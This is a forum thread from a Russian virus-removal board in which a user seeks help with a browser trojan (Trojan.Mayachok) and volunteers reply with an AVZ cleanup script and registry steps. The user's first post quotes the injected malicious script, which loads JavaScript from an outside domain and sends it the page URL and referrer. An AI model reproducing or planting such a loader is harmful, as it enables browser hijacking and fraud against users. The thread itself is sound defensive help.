Форум программистов, компьютерный форум CyberForum.ru Форум программистов | Компьютерный форум | Форум web-программистов | Форум по электронике и бытовой технике | Форум о софте | Научный форум | Карьера и бизнес
CyberForum.ru - форум программистов и сисадминов > Форум Компьютерный форум > Форум Компьютерная безопасность > Форум Лечение компьютерных вирусов
Восстановить пароль Регистрация

Ответ Создать новую тему
 
31.07.2012, 13:08   #1
ashma
Новичок
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус / Лечение компьютерных вирусов

Здравствуйте.
Поймал интересный вирус.

Вирус прописал адреса в файле хост ( как здесь: speedbar - вирус )

Браузеры не грузили страницы. Почистил файл хост, нашел и удалил вирусные файлы (taskhost.exe он назывался / лежал в appdata). Также почистил реестр и автозагрузку, связанные параметры с этим плохим файлом. Проверил компьютер на вирусы (нод / и CureIT в безопасном режиме). Все вроде хорошо.

Но ни одни из браузеров (4 браузера) не открывают нормально сайты в интернете. То подвисают сильно, то просто не могут открыть страницы, то еле еле грузят - через раз все. А еще на некоторых сайтах появляются всплывающие окна - там где не должно быть таких окон тоже.

Посмотрев исходные коды страниц, я увидел что в каждом из браузеров в конце страницы подписывается такой код (даже сейчас на вашем сайте), но почему-то этот код не грузится на сайтах поисковиков:
Код HTML5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script type="text/javascript">
/* <![CDATA[ */
 
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/litecube-f\/images\/icons\/folders.png","skins\/litecube-f\/images\/mail_footer.png","skins\/litecube-f\/images\/taskicons.gif","skins\/litecube-f\/images\/display\/loading.gif","skins\/litecube-f\/images\/pagenav.gif","skins\/litecube-f\/images\/mail_toolbar.png","skins\/litecube-f\/images\/searchfield.gif","skins\/litecube-f\/images\/messageicons.png","skins\/litecube-f\/images\/icons\/reset.gif","skins\/litecube-f\/images\/abook_toolbar.png","skins\/litecube-f\/images\/icons\/groupactions.png","skins\/litecube-f\/images\/watermark.png"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
/* ]]> */
</script>
 
<script>var gtl=self;if ( gtl == top ){document.write("<script src='http" + (("https:" == document.location.protocol) ? "s" : "") +"://forhttda.com/phpbb/js.php?ran="+encodeURIComponent("PtZs4fMZvs2bDhOQ3O1fG8S6hmdrZ9RNo5oVSpdox3OkHk1QosJbKivyrSmD0bD1oMgFRfj9e2g_")+"&t=stat&u="+escape(document.URL)+"&r="+escape(document.referrer)+"&v=35101&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script>
Также, для примера, вообще не грузятся сайты мэйл ру, в контакте,одноклассники, яндекс через раз..

не знаю что делать, как убрать это.. помогите, пожалуйста, советом
31.07.2012, 13:08
AdAgent
Объявления
31.07.2012, 13:12   #2
Katharsis
Заблокирован
Вирусоборец
браузерный вирус

Правила оформления запроса лечения. Если не будет логов, мы отправим вас в эту тему
Другие темы раздела
Лечение компьютерных вирусов Пропала скорость интернета
Propala skorost interneta. Bila 5000kb a stala 0,8kb. sdelaju skripti i visliu, i vilozu zdes. Budu ocen blagodarna za pomos! Пропала скорость интернета. была 5000kb а стала 0.8kb. Сделаю скрипты и вышлю, и выложу здесь. Буду очень благодарна за помощь!
При открытии браузера - загружает страничку spee ddial.ru Лечение компьютерных вирусов
Помогите плиз избавиться эт этой нечисти
31.07.2012, 13:28  [ТС]   #3
ashma
Новичок
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

я не могу скачать нужные программы для анализа, не могу прикреплять файлы... вирус мне просто не дает этого делать ни в одном брауезере. я бы рад, но ни как.. и другого компьютера рядом нет

Еще при попытке обновить браузеры на офф сайтах - грузится страничка о том, что в вашем браузере обнаружен вирус, чтоб обновить введите номер телефона для получения бесплатной смс с кодом для подтверждения что вы не робот. Причем текст одинаков совершенно на всех офф сайтах браузеров ( мозилла, эксплоир, опера). Домены в бразерной строке верные. Скрипт также не дает мне ходить по офф сайтам браузеров, всегда подгружая страничку о том что необходимо обновить браузер, так как он заражен.
31.07.2012, 13:44   #4
Katharsis
Заблокирован
Вирусоборец
браузерный вирус

отсюда сможете взять?

загрузить логи в крайнем случае можно на любой файлообменник
31.07.2012, 13:44
AdAgent
Объявления
01.08.2012, 09:50  [ТС]   #5
ashma
Новичок
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

сделал логи, пришлось воспользоваться другим компьютером для загрузки файлов
Вложения
Тип файла: rar info.rar (6.3 Кб, 36 просмотров)
Тип файла: rar log.rar (8.3 Кб, 15 просмотров)
Тип файла: zip virusinfo_syscheck.zip (30.6 Кб, 27 просмотров)
Тип файла: zip virusinfo_syscure.zip (31.7 Кб, 12 просмотров)
01.08.2012, 13:34   #6
Katharsis
Заблокирован
Вирусоборец
браузерный вирус

не имею технической возможности посмотреть ваши логи, подождите, ответит другой специалист
01.08.2012, 13:46   #7
shestale
Модератор
Вирусоборец
Регистрация: 22.02.2011
Сообщений: 6,926
Репутация: 6376 (2327)
Лучшие ответы: 69
браузерный вирус

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1. Закройте все программы, отключите антивирус, файрволл и прочее защитное ПО.

AVZ, меню Файл - Выполнить скрипт - Скопировать ниже написанный скрипт-Нажать кнопку Запустить.
Код Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Windows\system32\hvtdpdj.dll','');
 QuarantineFile('C:\Windows\System32\SearchProtocolHost.exe','');
 QuarantineFile('C:\Windows\system32\4502.tmp','');
 DeleteFile('C:\Windows\system32\4502.tmp');
 DeleteFile('C:\Windows\system32\hvtdpdj.dll');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyStrParamWrite('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','AutoCreateQuarantine', '"' + GetAVZDirectory + 'avz.exe' + '"' + ' Script=' + '"' + GetAVZDirectory + 'Script.txt' + '"');
AddLineToTxtFile(GetAVZDirectory + 'Script.txt', 'begin'+#13#10+' CreateQurantineArchive(GetAVZDirectory' + ' + ' + Chr(39) + 'quarantine.zip' + Chr(39) + ');'+#13#10+' RegKeyParamDel('+Chr(39)+'HKEY_CURRENT_USER'+Chr(39) + ', ' +Chr(39)+'SoftwareMicrosoftWindowsCurrentVersionRun'+Chr(39)+ ', '+Chr(39)+'AutoCreateQuarantine'+Chr(39)+');'+#13#10+' ExecuteFile('+Chr(39)+'explorer.exe'+Chr(39) + ', ' + 'GetAVZDirectory, 1, 0, false);'+#13#10+' ExitAVZ;'+#13#10+'end.');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU',2,3,true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится!

2. Полученный архив quarantine.zip из папки с AVZ, отправьте с помощью этой формы или на этот почтовый ящик: quarantine<at>safezone.cc (замените <at> на @), укажите ссылку на тему и ник на форуме.

3. Сделайте лог SecurityCheck by screen317

4. Скачайте Malwarebytes' Anti-Malware или с зеркала, установите, обновите базы, выберите "Perform Full Scan" ("Полное сканирование"), нажмите "Scan" ("Сканирование"), после сканирования - Ok - Show Results ("Показать результаты") - Откройте лог, скопируйте в блокнот и прикрепите его к следующему посту.
Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно. Загрузить обновление MBAM.

5. Повторите логи AVZ и Rsit и прикрепите их к сообщению.
01.08.2012, 14:16  [ТС]   #8
ashma
Новичок
Регистрация: 31.07.2012
Сообщений: 4
Репутация: 0 (0)
браузерный вирус

Спасибо за помощь.
Пока ждал ответа, сам разобрался.

Удалил остатки вирусов:

Встречается разновидность - trojan.mayachok.550.

Что представляет собой Trojan.Mayachok.1 (он же trojan.win32.ddox.ci, trojan.win32.cidox, trojan.win32.zapchast.feh, trojan:Win32/Vundo.OD, trojan.Win32.Mondere, trojan.Generic.KDV.169924)? По описаниям ресурса Dr.Web, это:


Цитата
Троянец, который крадет средства со счетов клиентов мобильных операторов, предлагая пользователям ответить на входящее СМС-сообщение.


Trojan.Mayachok.1 это файл .dll - динамически подключаемая библиотека, которая после установки загружается в адресное пространство памяти всех запущенных процессов (процесс установки заканчивается форсированной перезагрузкой компьютера), поэтому при сканировании системы антивирусом в нормальном режиме троянец часто видится пользователю как бы "сидящим внутри" различных файлов и "перемещающимся" из одного файла в другой. Может сложиться впечатление что Trojan.Mayachok.1 заражает файлы, но на самом деле это не так.

Что происходит после заражения? Описание повадок зловреда на сайте Dr.Web достаточно подробное поэтому не будем повторяться, от себя только добавлю что чаще всего пострадавший сталкивается со следующими проблемами:

// Подменой запрашиваемых страниц на "internet.com" "Ростелеком. Канал перегружен", "Подтвердите принадлежность аккаунта" и подобных;

// Полной невозможностью выйти в интернет при помощи любого браузера, или вместо нормальной загрузки сайта открытие страниц происходит в виде, напоминающем исходный код;

// Блокировкой запуска различных программ в нормальном режиме, в безопасном, как правило всё работает.

Итак, выяснили, у нас действительно Trojan.Mayachok.1 Как лечить? Нет смысла скачивать большое количество разнообразного антивирусного софта и тратить время на многочасовые проверки в надежде что поможет хоть что-то из этого - ни одно, так другое. Такая вероятность есть, но в некоторых случаях троянец хоть и определяется антивирусом, но оказывается ему не по зубам - при следующих проверках мы видим его снова и снова. Не стоит отчаиваться, всё на самом деле очень просто:

1. Открываем редактор реестра: нажимаем "Пуск" => "Выполнить" вписываем команду: regedit, нажимаем enter. Далее находим ветку:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
и параметр AppInit_DLLs

Смотрим значение этого параметра. Если видим запись, подобную этой:
"AppInit_DLLs" = "C:\windows\system32\tvhihgf.dll"

(кроме tvhihgf.dll имя файла может состоять семи из любых других латинских букв) - удаляем ее (имя файла запомните или запишите, чтобы потом легко его найти). Сам параметр AppInit_DLLs при этом оставляем, убираем только значение.

Ошибочные действия при правке реестра могут серьезно повредить систему!

----------------------------

а вот шаблон страницы, подгружаемой вирусом, не нашел, благодаря Вам также удалил плохую страницу.

Спасибо!

Добавлено через 4 минуты
И скрипт тоже выполнил. Полученный архивы и логи делаю, отправлю на указанную почту.
01.08.2012, 15:13   #9
akok
Форумчанин
Вирусоборец
Регистрация: 01.09.2009
Сообщений: 715
Репутация: 2980 (1014)
Лучшие ответы: 14
браузерный вирус / Лечение компьютерных вирусов

Не факт. Букет болезней еще никто не отменял. Прошу, выполняйте рекомендации без самодеятельности или мы прекратим оказывать вам помощь.
01.08.2012, 15:13
Yandex
Объявления
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
Ответ Создать новую тему

Похожие темы
Тема Раздел Автор Дата
C#: .NET 4.x Браузерный чат
Возможно ли реализовать на C# чат для браузера? Если да, то с чего начать?
C# для начинающих PARANOIA9 05.11.2013 21:07
Браузерный вирус - Лечение компьютерных вирусов
Здравствуйте. При открытии любой страницы с любого браузера рандомно вылезает что-то вроде баннера с непристойностями в верхнем левом углу,который можно закрыть. Все стандартные способы вроде перепробовал. Win7/Avast!. Буду очень рад помощи. Заранее спасибо.
Лечение компьютерных вирусов DenSkill 31.01.2013 20:36
Браузерный вирус - Лечение компьютерных вирусов
Лазил по интернету без антивируса, подхватил вирус который поразил хром, файерфокс, експлоер и оперу. Вот симтомы: 1. Хром не ищет ничего 2. Страницы постоянно закрываются и открывается гугл. 3. Появляется окно с надписью «Вы выиграли бонус ! Получите 50 бесплатных смс и 15 минут общения...
Лечение компьютерных вирусов SoftRogi 28.12.2012 22:16
браузерный вирус - Лечение компьютерных вирусов
в поисковике, заместо сайтов открывается html код страницы, некоторые страницы вообще не загружаются, сильно тормозит. на вас случайно наткнулся, проделал все операции. надеюсь поможите p.s^через некоторое время, заместо сайта открывается - internet.com и пишет подключите прокси, за смс...
Лечение компьютерных вирусов Layserg 22.12.2011 01:05
Браузерный 3D движок - Программирование игр и графики
Посоветуйте хороший браузерный 3D движок. Модераторы, можно как то исправить название темы? Задел кнопку, и получилась фигня. Должно было быть: "Браузерный 3D движок".
Программирование игр и графики taras atavin 05.04.2011 10:18
Опции темы

Текущее время: 20:24. Часовой пояс GMT +4.

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.7 PL3
Copyright ©2000 - 2014, vBulletin Solutions, Inc.